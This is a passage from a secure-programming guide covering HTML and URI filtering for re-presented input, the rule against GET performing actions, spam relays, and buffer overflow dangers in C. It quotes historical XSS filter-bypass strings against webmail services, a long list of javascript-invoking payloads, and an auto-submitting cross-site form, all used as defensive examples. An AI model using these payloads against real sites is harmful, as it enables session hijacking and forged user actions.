applications, we'll call this problem ``cross-site malicious content.'' In
short, you cannot accept input (including any form data) without checking,
filtering, or encoding it. For more information, see Section 7.15.

Fundamentally, this means that all web application input must be filtered (so
characters that can cause this problem are removed), encoded (so the
characters that can cause this problem are encoded in a way to prevent the
problem), or validated (to ensure that only ``safe'' data gets through).
Filtering and validation should often be done at the input, but encoding can
be done either at input or output time. If you're just passing the data
through without analysis, it's probably better to encode the data on input
(so it won't be forgotten), but if you're processing the data, there are
arguments for encoding on output instead.
-----------------------------------------------------------------------------

5.11. Filter HTML/URIs That May Be Re-presented

One special case where cross-site malicious content must be prevented are web
applications which are designed to accept HTML or XHTML from one user, and
then send it on to other users (see Section 7.15 for more information on
cross-site malicious content). The following subsections discuss filtering
this specific kind of input, since handling it is such a common requirement.
-----------------------------------------------------------------------------

5.11.1. Remove or Forbid Some HTML Data

It's safest to remove all possible (X)HTML tags so they cannot affect
anything, and this is relatively easy to do. As noted above, you should
already be identifying the list of legal characters, and rejecting or
removing those characters that aren't in the list. In this filter, simply
don't include the following characters in the list of legal characters: ``<
'', ``>'', and ``&'' (and if they're used in attributes, the double-quote
character ``"''). If browsers only operated according the HTML
specifications, the ``>"'' wouldn't need to be removed, but in practice it
must be removed. This is because some browsers assume that the author of the
page really meant to put in an opening "<" and ``helpfully'' insert one -
attackers can exploit this behavior and use the ">" to create an undesired "<
".

Usually the character set for transmitting HTML is ISO-8859-1 (even when
sending international text), so the filter should also omit most control
characters (linefeed and tab are usually okay) and characters with their
high-order bit set.

One problem with this approach is that it can really surprise users,
especially those entering international text if all international text is
quietly removed. If the invalid characters are quietly removed without
warning, that data will be irrevocably lost and cannot be reconstructed
later. One alternative is forbidding such characters and sending error
messages back to users who attempt to use them. This at least warns users,
but doesn't give them the functionality they were looking for. Other
alternatives are encoding this data or validating this data, which are
discussed next.
-----------------------------------------------------------------------------

5.11.2. Encoding HTML Data

An alternative that is nearly as safe is to transform the critical characters
so they won't have their usual meaning in HTML. This can be done by
translating all "<" into "&lt;", ">" into "&gt;", and "&" into "&amp;".
Arbitrary international characters can be encoded in Latin-1 using the format
"&#value;" - do not forget the ending semicolon. Encoding the international
characters means you must know what the input encoding was, of course.

One possible danger here is that if these encodings are accidentally
interpreted twice, they will become a vulnerability. However, this approach
at least permits later users to see the "intent" of the input.
-----------------------------------------------------------------------------

5.11.3. Validating HTML Data

Some applications, to work at all, must accept HTML from third parties and
send them on to their users. Beware - you are treading dangerous ground at
this point; be sure that you really want to do this. Even the idea of
accepting HTML from arbitrary places is controversial among some security
practitioners, because it is extremely difficult to get it right.

However, if your application must accept HTML, and you believe that it's
worth the risk, at least identify a list of ``safe'' HTML commands and only
permit those commands.

Here is a minimal set of safe HTML tags that might be useful for applications
(such as guestbooks) that support short comments: <p> (paragraph), <b>
(bold), <i> (italics), <em> (emphasis), <strong> (strong emphasis), <pre>
(preformatted text), <br> (forced line break - note it doesn't require a
closing tag), as well as all their ending tags.

Not only do you need to ensure that only a small set of ``safe'' HTML
commands are accepted, you also need to ensure that they are properly nested
and closed (i.e., that the HTML commands are ``balanced''). In XML, this is
termed ``well-formed'' data. A few exceptions could be made if you're
accepting standard HTML (e.g., supporting an implied </p> where not provided
before a <p> would be fine), but trying to accept HTML in its full generality
(which can infer balancing closing tags in many cases) is not needed for most
applications. Indeed, if you're trying to stick to XHTML (instead of HTML),
then well-formedness is a requirement. Also, HTML tags are case-insensitive;
tags can be upper case, lower case, or a mixture. However, if you intend to
accept XHTML then you need to require all tags to be in lower case (XML is
case-sensitive; XHTML uses XML and requires the tags to be in lower case).

Here are a few random tips about doing this. Usually you should design
whatever surrounds the HTML text and the set of permitted tags so that the
contributed text cannot be misinterpreted as text from the ``main'' site (to
prevent forgeries). Don't accept any attributes unless you've checked the
attribute type and its value; there are many attributes that support things
such as Javascript that can cause trouble for your users. You'll notice that
in the above list I didn't include any attributes at all, which is certainly
the safest course. You should probably give a warning message if an unsafe
tag is used, but if that's not practical, encoding the critical characters
(e.g., "<" becomes "&lt;") prevents data loss while simultaneously keeping
the users safe.

Be careful when expanding this set, and in general be restrictive of what you
accept. If your patterns are too generous, the browser may interpret the
sequences differently than you expect, resulting in a potential exploit. For
example, FozZy posted on Bugtraq (1 April 2002) some sequences that permitted
exploitation in various web-based mail systems, which may give you an idea of
the kinds of problems you need to defend against. Here's some exploit text
that, at one time, could subvert user accounts in Microsoft Hotmail:
   <SCRIPT>
   </COMMENT>
   <!-- --> -->
Here's some similar exploit text for Yahoo! Mail:
  <_a<script>
  <<script>        (Note: this was found by BugSan)
Here's some exploit text for Vizzavi:
  <b onmousover="...">go here</b>
  <img [line_break] src="javascript:alert(document.location)">
Andrew Clover posted to Bugtraq (on May 11, 2002) a list of various text that
invokes Javascript yet manages to bypass many filters. Here are his examples
(which he says he cut and pasted from elsewhere); some only apply to specific
browsers (IE means Internet Explorer, N4 means Netscape version 4).
  <a href="javas&#99;ript&#35;[code]">
  <div onmouseover="[code]">
  <img src="javascript:[code]">
  <img dynsrc="javascript:[code]"> [IE]
  <input type="image" dynsrc="javascript:[code]"> [IE]
  <bgsound src="javascript:[code]"> [IE]
  &<script>[code]</script>
  &{[code]}; [N4]
  <img src=&{[code]};> [N4]
  <link rel="stylesheet" href="javascript:[code]">
  <iframe src="vbscript:[code]"> [IE]
  <img src="mocha:[code]"> [N4]
  <img src="livescript:[code]"> [N4]
  <a href="about:<s&#99;ript>[code]</script>">
  <meta http-equiv="refresh" content="0;url=javascript:[code]">
  <body onload="[code]">
  <div style="background-image: url(javascript:[code]);">
  <div style="behaviour: url([link to code]);"> [IE]
  <div style="binding: url([link to code]);"> [Mozilla]
  <div style="width: expression([code]);"> [IE]
  <style type="text/javascript">[code]</style> [N4]
  <object classid="clsid:..." codebase="javascript:[code]"> [IE]
  <style><!--</style><script>[code]//--></script>
  <!-- -- --><script>[code]</script><!-- -- -->
  <<script>[code]</script>
  <img src="blah"onmouseover="[code]">
  <img src="blah>" onmouseover="[code]">
  <xml src="javascript:[code]">
  <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
    <div datafld="b" dataformatas="html" datasrc="#X"></div>
  [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
  <![CDATA[<!--]] ><script>[code]//--></script>
This is not a complete list, of course, but it at least is a sample of the
kinds of attacks that you must prevent by strictly limiting the tags and
attributes you can allow from untrusted users.

Konstantin Riabitsev has posted [http://www.mricon.com/html/phpfilter.html]
some PHP code to filter HTML (GPL); I've not examined it closely, but you
might want to take a look.
-----------------------------------------------------------------------------

5.11.4. Validating Hypertext Links (URIs/URLs)

Careful readers will notice that I did not include the hypertext link tag <a>
as a safe tag in HTML. Clearly, you could add <a href="safe URI"> (hypertext
link) to the safe list (not permitting any other attributes unless you've
checked their contents). If your application requires it, then do so.
However, permitting third parties to create links is much less safe, because
defining a ``safe URI''[1] turns out to be very difficult. Many browsers
accept all sorts of URIs which may be dangerous to the user. This section
discusses how to validate URIs from third parties for re-presenting to
others, including URIs incorporated into HTML.

First, let's look briefly at URI syntax (as defined by various
specifications). URIs can be either ``absolute'' or ``relative''. The syntax
of an absolute URI looks like this:
scheme://authority[path][?query][#fragment]
A URI starts with a scheme name (such as ``http''), the characters ``://'',
the authority (such as ``www.dwheeler.com''), a path (which looks like a
directory or file name), a question mark followed by a query, and a hash (``#
'') followed by a fragment identifier. The square brackets surround optional
portions - e.g., many URIs don't actually include the query or fragment. Some
schemes may not permit some of the data (e.g., paths, queries, or fragments),
and many schemes have additional requirements unique to them. Many schemes
permit the ``authority'' field to identify optional usernames, passwords, and
ports, using this syntax for the ``authority'' section:
 [username[:password]@]host[:portnumber]
The ``host'' can either be a name (``www.dwheeler.com'') or an IPv4 numeric
address (127.0.0.1). A ``relative'' URI references one object relative to the
``current'' one, and its syntax looks a lot like a filename:
path[?query][#fragment]
There are a limited number of characters permitted in most of the URI, so to
get around this problem, other 8-bit characters may be ``URL encoded'' as %hh
(where hh is the hexadecimal value of the 8-bit character). For more detailed
information on valid URIs, see IETF RFC 2396 and its related specifications.

Now that we've looked at the syntax of URIs, let's examine the risks of each
part:

<A0><A0>*<2A>Scheme: Many schemes are downright dangerous. Permitting someone to
    insert a ``javascript'' scheme into your material would allow them to
    trivially mount denial-of-service attacks (e.g., by repeatedly creating
    windows so the user's machine freezes or becomes unusable). More
    seriously, they might be able to exploit a known vulnerability in the
    javascript implementation. Some schemes can be a nuisance, such as
    ``mailto:'' when a mailing is not expected, and some schemes may not be
    sufficiently secure on the client machine. Thus, it's necessary to limit
    the set of allowed schemes to just a few safe schemes.

<A0><A0>*<2A>Authority: Ideally, you should limit user links to ``safe'' sites, but
    this is difficult to do in practice. However, you can certainly do
    something about usernames, passwords, and port numbers: you should forbid
    them. Systems expecting usernames (especially with passwords!) are
    probably guarding more important material; rarely is this needed in
    publicly-posted URIs, and someone could try to use this functionality to
    convince users to expose information they have access to and/or use it to
    modify the information. Such URIs permit semantic attacks; see Section
    7.16 for more information. Usernames without passwords are no less
    dangerous, since browsers typically cache the passwords. You should not
    usually permit specification of ports, because different ports expect
    different protocols and the resulting ``protocol confusion'' can produce
    an exploit. For example, on some systems it's possible to use the
    ``gopher'' scheme and specify the SMTP (email) port to cause a user to
    send email of the attacker's choosing. You might permit a few special
    cases (e.g., http ports 8008 and 8080), but on the whole it's not worth
    it. The host when specified by name actually has a fairly limited
    character set (using the DNS standards). Technically, the standard
    doesn't permit the underscore (``_'') character, but Microsoft ignored
    this part of the standard and even requires the use of the underscore in
    some circumstances, so you probably should allow it. Also, there's been a
    great deal of work on supporting international characters in DNS names,
    which is not further discussed here.

<A0><A0>*<2A>Path: Permitting a path is usually okay, but unfortunately some
    applications use part of the path as query data, creating an opening
    we'll discuss next. Also, paths are allowed to contain phrases like
    ``..'', which can expose private data in a poorly-written web server;
    this is less a problem than it once was and really should be fixed by the
    web server. Since it's only the phrase ``..'' that's special, it's
    reasonable to look at paths (and possibly query data) and forbid ``../''
    as a content. However, if your validator permits URL escapes, this can be
    difficult; now you need to prevent versions where some of these
    characters are escaped, and may also have to deal with various
    ``illegal'' character encodings of these characters as well.

<A0><A0>*<2A>Query: Query formats (beginning with "?") can be a security risk because
    some query formats actually cause actions to occur on the serving end.
    They shouldn't, and your applications shouldn't, as discussed in Section
    5.12 for more information. However, we have to acknowledge the reality as
    a serious problem. In addition, many web sites are actually
    ``redirectors'' - they take a parameter specifying where the user should
    be redirected, and send back a command redirecting the user to the new
    location. If an attacker references such sites and provides a more
    dangerous URI as the redirection value, and the browser blithely obeys
    the redirection, this could be a problem. Again, the user's browser
    should be more careful, but not all user browsers are sufficiently
    cautious. Also, many web applications have vulnerabilities that can be
    exploited with certain query values, but in general this is hard to
    prevent. The official URI specifications don't sanction the ``+'' (plus)
    character, but in practice the ``+'' character often represents the space
    character.

<A0><A0>*<2A>Fragment: Fragments basically locate a portion of a document; I'm unaware
    of an attack based on fragments as long as the syntax is legal, but the
    legality of its syntax does need checking. Otherwise, an attacker might
    be able to insert a character such as the double-quote (") and
    prematurely end the URI (foiling any checking).

<A0><A0>*<2A>URL escapes: URL escapes are useful because they can represent arbitrary
    8-bit characters; they can also be very dangerous for the same reasons.
    In particular, URL escapes can represent control characters, which many
    poorly-written web applications are vulnerable to. In fact, with or
    without URL escapes, many web applications are vulnerable to certain
    characters (such as backslash, ampersand, etc.), but again this is
    difficult to generalize.

<A0><A0>*<2A>Relative URIs: Relative URIs should be reasonably safe (if you manage the
    web site well), although in some applications there's no good reason to
    allow them either.


Of course, there is a trade-off with simplicity as well. Simple patterns are
easier to understand, but they aren't very refined (so they tend to be too
permissive or too restrictive, even more than a refined pattern). Complex
patterns can be more exact, but they are more likely to have errors, require
more performance to use, and can be hard to implement in some circumstances.

Here's my suggestion for a ``simple mostly safe'' URI pattern which is very
simple and can be implemented ``by hand'' or through a regular expression;
permit the following pattern:
(http|ftp|https)://[-A-Za-z0-9._/]+

This pattern doesn't permit many potentially dangerous capabilities such as
queries, fragments, ports, or relative URIs, and it only permits a few
schemes. It prevents the use of the ``%'' character, which is used in URL
escapes and can be used to specify characters that the server may not be
prepared to handle. Since it doesn't permit either ``:'' or URL escapes, it
doesn't permit specifying port numbers, and even using it to redirect to a
more dangerous URI would be difficult (due to the lack of the escape
character). It also prevents the use of a number of other characters; again,
many poorly-designed web applications can't handle a number of ``unexpected''
characters.

Even this ``mostly safe'' URI permits a number of questionable URIs, such as
subdirectories (via ``/'') and attempts to move up directories (via `..'');
illegal queries of this kind should be caught by the server. It permits some
illegal host identifiers (e.g., ``20.20''), though I know of no case where
this would be a security weakness. Some web applications treat subdirectories
as query data (or worse, as command data); this is hard to prevent in general
since finding ``all poorly designed web applications'' is hopeless. You could
prevent the use of all paths, but this would make it impossible to reference
most Internet information. The pattern also allows references to local server
information (through patterns such as "http:///", "http://localhost/", and
"http://127.0.0.1") and access to servers on an internal network; here you'll
have to depend on the servers correctly interpreting the resulting HTTP GET
request as solely a request for information and not a request for an action,
as recommended in Section 5.12. Since query forms aren't permitted by this
pattern, in many environments this should be sufficient.

Unfortunately, the ``mostly safe'' pattern also prevents a number of quite
legitimate and useful URIs. For example, many web sites use the ``?''
character to identify specific documents (e.g., articles on a news site). The
``#'' character is useful for specifying specific sections of a document, and
permitting relative URIs can be handy in a discussion. Various permitted
characters and URL escapes aren't included in the ``mostly safe'' pattern.
For example, without permitting URL escapes, it's difficult to access many
non-English pages. If you truly need such functionality, then you can use
less safe patterns, realizing that you're exposing your users to higher risk
while giving your users greater functionality.

One pattern that permits queries, but at least limits the protocols and ports
used is the following, which I'll call the ``simple somewhat safe pattern'':
 (http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?
This pattern actually isn't very smart, since it permits illegal escapes,
multiple queries, queries in ftp, and so on. It does have the advantage of
being relatively simple.

Creating a ``somewhat safe'' pattern that really limits URIs to legal values
is quite difficult. Here's my current attempt to do so, which I call the
``sophisticated somewhat safe pattern'', expressed in a form where whitespace
is ignored and comments are introduced with "#":
 (
 (
  # Handle http, https, and relative URIs:
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
   (\?(                                                              # query:
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
        ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
        (\&([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
         ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
       |
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+  # isindex
       )
   ))?
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )|
 # Handle ftp:
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )
 )


Even the sophisticated pattern shown above doesn't forbid all illegal URIs.
For example, again, "20.20" isn't a legal domain name, but it's allowed by
the pattern; however, to my knowledge this shouldn't cause any security
problems. The sophisticated pattern forbids URL escapes that represent
control characters (e.g., %00 through $1F) - the smallest permitted escape
value is %20 (ASCII space). Forbidding control characters prevents some
trouble, but it's also limiting; change "2-9" to "0-9" everywhere if you need
to support sending all control characters to arbitrary web applications. This
pattern does permit all other URL escape values in paths, which is useful for
international characters but could cause trouble for a few systems which
can't handle it. The pattern at least prevents spaces, linefeeds,
double-quotes, and other dangerous characters from being in the URI, which
prevents other kinds of attacks when incorporating the URI into a generated
document. Note that the pattern permits ``+'' in many places, since in
practice the plus is often used to replace the space character in queries and
fragments.

Unfortunately, as noted above, there are attacks which can work through any
technique that permit query data, and there don't seem to be really good
defenses for them once you permit queries. So, you could strip out the
ability to use query data from the pattern above, but permit the other forms,
producing a ``sophisticated mostly safe'' pattern:
 (
 (
  # Handle http, https, and relative URIs:
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )|
 # Handle ftp:
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )
 )

As far as I can tell, as long as these patterns are only used to check
hypertext anchors selected by the user (the "<a>" tag) this approach also
prevents the insertion of ``web bugs''. Web bugs are simply text that allow
someone other than the originating web server of the main page to track
information such as who read the content and when they read it - see Section
8.7 for more information. This isn't true if you use the <img> (image) tag
with the same checking rules - the image tag is loaded immediately,
permitting someone to add a ``web bug''. Once again, this presumes that
you're not permitting any attributes; many attributes can be quite dangerous
and pierce the security you're trying to provide.

Please note that all of these patterns require the entire URI match the
pattern. An unfortunate fact of these patterns is that they limit the
allowable patterns in a way that forbids many useful ones (e.g., they prevent
the use of new URI schemes). Also, none of them can prevent the very real
problem that some web sites perform more than queries when presented with a
query - and some of these web sites are internal to an organization. As a
result, no URI can really be safe until there are no web sites that accept
GET queries as an action (see Section 5.12). For more information about legal
URLs/URIs, see IETF RFC 2396; domain name syntax is further discussed in IETF
RFC 1034.
-----------------------------------------------------------------------------

5.11.5. Other HTML tags

You might even consider supporting more HTML tags. Obvious next choices are
the list-oriented tags, such as <ol> (ordered list), <ul> (unordered list),
and <li> (list item). However, after a certain point you're really permitting
full publishing (in which case you need to trust the provider or perform more
serious checking than will be described here). Even more importantly, every
new functionality you add creates an opportunity for error (and exploit).

One example would be permitting the <img> (image) tag with the same URI
pattern. It turns out this is substantially less safe, because this permits
third parties to insert ``web bugs'' into the document, identifying who read
the document and when. See Section 8.7 for more information on web bugs.
-----------------------------------------------------------------------------

5.11.6. Related Issues

Web applications should also explicitly specify the character set (usually
ISO-8859-1), and not permit other characters, if data from untrusted users is
being used. See Section 9.5 for more information.

Since filtering this kind of input is easy to get wrong, other alternatives
have been discussed as well. One option is to ask users to use a different
language, much simpler than HTML, that you've designed - and you give that
language very limited functionality. Another approach is parsing the HTML
into some internal ``safe'' format, and then translating that safe format
back to HTML.

Filtering can be done during input, output, or both. The CERT recommends
filtering data during the output process, just before it is rendered as part
of the dynamic page. This is because, if it is done correctly, this approach
ensures that all dynamic content is filtered. The CERT believes that
filtering on the input side is less effective because dynamic content can be
entered into a web sites database(s) via methods other than HTTP, and in this
case, the web server may never see the data as part of the input process.
Unless the filtering is implemented in all places where dynamic data is
entered, the data elements may still be remain tainted.

However, I don't agree with CERT on this point for all cases. The problem is
that it's just as easy to forget to filter all the output as the input, and
allowing ``tainted'' input into your system is a disaster waiting to happen
anyway. A secure program has to filter its inputs anyway, so it's sometimes
better to include all of these checks as part of the input filtering (so that
maintainers can see what the rules really are). And finally, in some secure
programs there are many different program locations that may output a value,
but only a very few ways and locations where a data can be input into it; in
such cases filtering on input may be a better idea.
-----------------------------------------------------------------------------

5.12. Forbid HTTP GET To Perform Non-Queries

Web-based applications using HTTP should prevent the use of the HTTP ``GET''
or ``HEAD'' method for anything other than queries. HTTP includes a number of
different methods; the two most popular methods used are GET and POST. Both
GET and POST can be used to transmit data from a form, but the GET method
transmits data in the URL, while the POST method transmits data separately.

The security problem of using GET to perform non-queries (such as changing
data, transferring money, or signing up for a service) is that an attacker
can create a hypertext link with a URL that includes malicious form data. If
the attacker convinces a victim to click on the link (in the case of a
hypertext link), or even just view a page (in the case of transcluded
information such as images from HTML's img tag), the victim will perform a
GET. When the GET is performed, all of the form data created by the attacker
will be sent by the victim to the link specified. This is a cross-site
malicious content attack, as discussed further in Section 7.15.

If the only action that a malicious cross-site content attack can perform is
to make the user view unexpected data, this isn't as serious a problem. This
can still be a problem, of course, since there are some attacks that can be
made using this capability. For example, there's a potential loss of privacy
due to the user requesting something unexpected, possible real-world effects
from appearing to request illegal or incriminating material, or by making the
user request the information in certain ways the information may be exposed
to an attacker in ways it normally wouldn't be exposed. However, even more
serious effects can be caused if the malicious attacker can cause not just
data viewing, but changes in data, through a cross-site link.

Typical HTTP interfaces (such as most CGI libraries) normally hide the
differences between GET and POST, since for getting data it's useful to treat
the methods ``the same way.'' However, for actions that actually cause
something other than a data query, check to see if the request is something
other than POST; if it is, simply display a filled-in form with the data
given and ask the user to confirm that they really mean the request. This
will prevent cross-site malicious content attacks, while still giving users
the convenience of confirming the action with a single click.

Indeed, this behavior is strongly recommended by the HTTP specification.
According to the HTTP 1.1 specification (IETF RFC 2616 section 9.1.1), ``the
GET and HEAD methods SHOULD NOT have the significance of taking an action
other than retrieval. These methods ought to be considered "safe". This
allows user agents to represent other methods, such as POST, PUT and DELETE,
in a special way, so that the user is made aware of the fact that a possibly
unsafe action is being requested.''

In the interest of fairness, I should note that this doesn't completely solve
the problem, because on some browsers (in some configurations) scripted posts
can do the same thing. For example, imagine a web browser with ECMAscript
(Javascript) enabled receiving the following HTML snippet - on some browsers,
simply displaying this HTML snippet will automatically force the user to send
a POST request to a website chosen by the attacker, with form data defined by
the attacker:
  <form action=http://remote/script.cgi method=post name=b>
    <input type=hidden name=action value="do something">
    <input type=submit>
  </form>
  <script>document.b.submit()</script>
My thanks to David deVitry pointing this out. However, although this advice
doesn't solve all problems, it's still worth doing. In part, this is because
the remaining problem can be solved by smarter web browsers (e.g., by always
confirming the data before allowing ECMAscript to send a web form) or by web
browser configuration (e.g., disabling ECMAscript). Also, this attack doesn't
work in many cross-site scripting exploits, because many websites don't allow
users to post ``script'' commands but do allow arbitrary URL links. Thus,
limiting the actions a GET command can perform to queries significantly
improves web application security.
-----------------------------------------------------------------------------

5.13. Counter SPAM

Any program that can send email elsewhere, by request from the network, can
be used to transport spam. Spam is the usual name for unsolicited bulk email
(UBE) or mass unsolicited email. It's also sometimes called unsolicited
commercial email (UCE), though that name is misleading - not all spam is
commercial. For a discussion of why spam is such a serious problem and more
general discussion about it, see my essay at [http://www.dwheeler.com/essays/
stopspam.html] http://www.dwheeler.com/essays/stopspam.html, as well as
[http://mail-abuse.org/] http://mail-abuse.org/, [http://spam.abuse.net/]
http://spam.abuse.net/, [http://http://www.cauce.org/] CAUCE, and [http://
www.faqs.org/rfcs/rfc2635.html] IETF RFC 2635. Spam receivers and
intermediaries bear most of the cost of spam, while the spammer spends very
little to send it. Therefore many people regard spam as a theft of service,
not just some harmless activity, and that number increases as the amount of
spam increases.

If your program can be used to generate email sent to others (such as a mail
transfer agent, generator of data sent by email, or a mailing list manager),
be sure to write your program to prevent its unauthorized use as a mail
relay. A program should usually only allow legitimate authorized users to
send email to others (e.g., those inside that company's mail server or those
legitimately subscribed to the service). More information about this is in
[http://www.faqs.org/rfcs/rfc2505.html] IETF RFC 2505 Also, if you manage a
mailing list, make sure that it can enforce the rule that only subscribers
can post to the list, and create a ``log in'' feature that will make it
somewhat harder for spammers to subscribe, spam, and unsubscribe easily.

One way to more directly counter SPAM is to incorporate support for the MAPS
(Mail Abuse Prevention System LLC) RBL (Realtime Blackhole List), which
maintains in real-time a list of IP addresses where SPAM is known to
originate. For more information, see [http://mail-abuse.org/rbl/] http://
mail-abuse.org/rbl/. Many current Mail Transfer Agents (MTAs) already support
the RBL; see their websites for how to configure them. The usual way to use
the RBL is to simply refuse to accept any requests from IP addresses in the
blackhole list; this is harsh, but it solves the problem. Another similar
service is the Open Relay Database (ORDB) at [http://ordb.org] http://
ordb.org, which identifies dynamically those sites that permit open email
relays (open email relays are misconfigured email servers that allow spammers
to send email through them). Another location for more information is [http:/
/www.spews.org] SPEWS. I believe there are other similar services as well.

I suggest that many systems and programs, by default, enable spam blocking if
they can send email on to others whose identity is under control of a remote
user - and that includes MTAs. At the least, consider this. There are real
problems with this suggestion, of course - you might (rarely) inhibit
communication with a legitimate user. On the other hand, if you don't block
spam, then it's likely that everyone else will blackhole your system (and
thus ignore your emails). It's not a simple issue, because no matter what you
do, some people will not allow you to send them email. And of course, how
well do you trust the organization keeping up the real-time blackhole list -
will they add truly innocent sites to the blackhole list, and will they
remove sites from the blackhole list once all is okay? Thus, it becomes a
trade-off - is it more important to talk to spammers (and a few innocents as
well), or is it more important to talk to those many other systems with spam
blocks (losing those innocents who share equipment with spammers)? Obviously,
this must be configurable. This is somewhat controversial advice, so consider
your options for your circumstance.
-----------------------------------------------------------------------------

5.14. Limit Valid Input Time and Load Level

Place time-outs and load level limits, especially on incoming network data.
Otherwise, an attacker might be able to easily cause a denial of service by
constantly requesting the service.
-----------------------------------------------------------------------------

Chapter 6. Avoid Buffer Overflow

<A0>                                      An enemy will overrun the land; he
                                       will pull down your strongholds and
                                       plunder your fortresses.
<A0>                                                             Amos 3:11 (NIV)

An extremely common security flaw is vulnerability to a ``buffer overflow''.
Buffer overflows are also called ``buffer overruns'', and there are many
kinds of buffer overflow attacks (including ``stack smashing'' and ``heap
smashing'' attacks). Technically, a buffer overflow is a problem with the
program's internal implementation, but it's such a common and serious problem
that I've placed this information in its own chapter. To give you an idea of
how important this subject is, at the CERT, 9 of 13 advisories in 1998 and at
least half of the 1999 advisories involved buffer overflows. An informal 1999
survey on Bugtraq found that approximately 2/3 of the respondents felt that
buffer overflows were the leading cause of system security vulnerability (the
remaining respondents identified ``mis-configuration'' as the leading cause)
[Cowan 1999]. This is an old, well-known problem, yet it continues to
resurface [McGraw 2000].

A buffer overflow occurs when you write a set of values (usually a string of
characters) into a fixed length buffer and write at least one value outside
that buffer's boundaries (usually past its end). A buffer overflow can occur
when reading input from the user into a buffer, but it can also occur during
other kinds of processing in a program.

If a secure program permits a buffer overflow, the overflow can often be
exploited by an adversary. If the buffer is a local C variable, the overflow
can be used to force the function to run code of an attackers' choosing. This
specific variation is often called a ``stack smashing'' attack. A buffer in
the heap isn't much better; attackers may be able to use such overflows to
control other variables in the program. More details can be found from Aleph1
[1996], Mudge [1995], LSD [2001], or the Nathan P. Smith's "Stack Smashing
Security Vulnerabilities" website at [http://destroy.net/machines/security/]
http://destroy.net/machines/security/. A discussion of the problem and some
ways to counter them is given by Crispin Cowan et al, 2000, at [http://
immunix.org/StackGuard/discex00.pdf] http://immunix.org/StackGuard/
discex00.pdf. A discussion of the problem and some ways to counter them in
Linux is given by Pierre-Alain Fayolle and Vincent Glaume at [http://
www.enseirb.fr/~glaume/indexen.html] http://www.enseirb.fr/~glaume/
indexen.html.

Most high-level programming languages are essentially immune to this problem,
either because they automatically resize arrays (e.g., Perl), or because they
normally detect and prevent buffer overflows (e.g., Ada95). However, the C
language provides no protection against such problems, and C++ can be easily
used in ways to cause this problem too. Assembly language also provides no
protection, and some languages that normally include such protection (e.g.,
Ada and Pascal) can have this protection disabled (for performance reasons).
Even if most of your program is written in another language, many library
routines are written in C or C++, as well as ``glue'' code to call them, so
other languages often don't provide as complete a protection from buffer
overflows as you'd like.
-----------------------------------------------------------------------------

6.1. Dangers in C/C++

C users must avoid using dangerous functions that do not check bounds unless
they've ensured that the bounds will never get exceeded. Functions to avoid
in most cases (or ensure protection) include the functions strcpy(3), strcat
(3), sprintf(3) (with cousin vsprintf(3)), and gets(3). These should be
replaced with functions such as strncpy(3), strncat(3), snprintf(3), and
fgets(3) respectively, but see the discussion below. The function strlen(3)
should be avoided unless you can ensure that there will be a terminating NIL
character to find. The scanf() family (scanf(3), fscanf(3), sscanf(3), vscanf
(3), vsscanf(3), and vfscanf(3)) is often dangerous to use; do not use it to
send data to a string without controlling the maximum length (the format %s
is a particularly common problem). Other dangerous functions that may permit
buffer overruns (depending on their use) include realpath(3), getopt(3),
getpass(3), streadd(3), strecpy(3), and strtrns(3). You must be careful with
getwd(3); the buffer sent to getwd(3) must be at least PATH_MAX bytes long.
The select(2) helper macros FD_SET(), FD_CLR(), and FD_ISSET() do not check
that the index fd is within bounds; make sure that fd >= 0 and fd <=
FD_SETSIZE (this particular one has been exploited in pppd).

Unfortunately, snprintf()'s variants have additional problems. Officially,
snprintf() is not a standard C function in the ISO 1990 (ANSI 1989) standard,
though sprintf() is, so not all systems include snprintf(). Even worse, some
systems' snprintf() do not actually protect against buffer overflows; they
just call sprintf directly. Old versions of Linux's libc4 depended on a
``libbsd'' that did this horrible thing, and I'm told that some old HP
systems did the same. Linux's current version of snprintf is known to work
correctly, that is, it does actually respect the boundary requested. The
return value of snprintf() varies as well; the Single Unix Specification
(SUS) version 2 and the C99 standard differ on what is returned by snprintf
